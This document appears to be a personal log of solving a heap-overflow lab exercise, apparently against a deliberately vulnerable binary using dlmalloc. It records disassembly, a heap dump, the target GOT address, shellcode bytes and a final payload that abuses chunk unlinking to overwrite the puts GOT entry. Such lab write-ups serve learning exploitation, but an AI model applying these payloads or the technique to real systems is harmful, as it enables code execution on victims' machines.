===DAY-0===
Interesting instructions:
---INSTRUCTION---
0x080498b0 <free+140>:  lea    eax,[edx+eax*1]          ; Start of chunk + size of chunk
0x80498e2 <free+190>:   add    DWORD PTR [ebp-0x34],eax ; Add prev_chunk size to the ptr to start of current chunk
-----------------

Notes:
Overwrote the size of last chunk with an even number 0x50. Heap looks like this after being freed.
---HEAP---
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000050      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
----------

===DAY-1===
puts GOT addr: 0x0804b128

Current payload:
`run $(python -c "print 'A'*32 + '\xd4\xff\xff\xff' + '\xfc\xff\xff\xff'") BBBBBBBBBBBBBBBB CCCC$(python -c "print '<FD>' + '<BK>'")`

Shellcode:
"\xB8\x64\x88\x04\x08\xFF\xD0"

Notes:
Today I was able to write to the GOT successfuly. But I keep segfaulting, I think it's due to
the second if case in line 3649 in dlmalloc.c.

===DAY-2===
SOLVED!

Final payload:
run $(python -c "print 'A'*4 + '\xB8\x64\x88\x04\x08\xFF\xD0' + 'A'*21 + '\xf8\xff\xff\xff' + '\xfc\xff\xff\xff'") "$(python -c "print 'B'*8 + '\x0c\xc0\x04\x08' + '\x20\xb1\x04\x08'")" $(python -c "print 'C'*4")
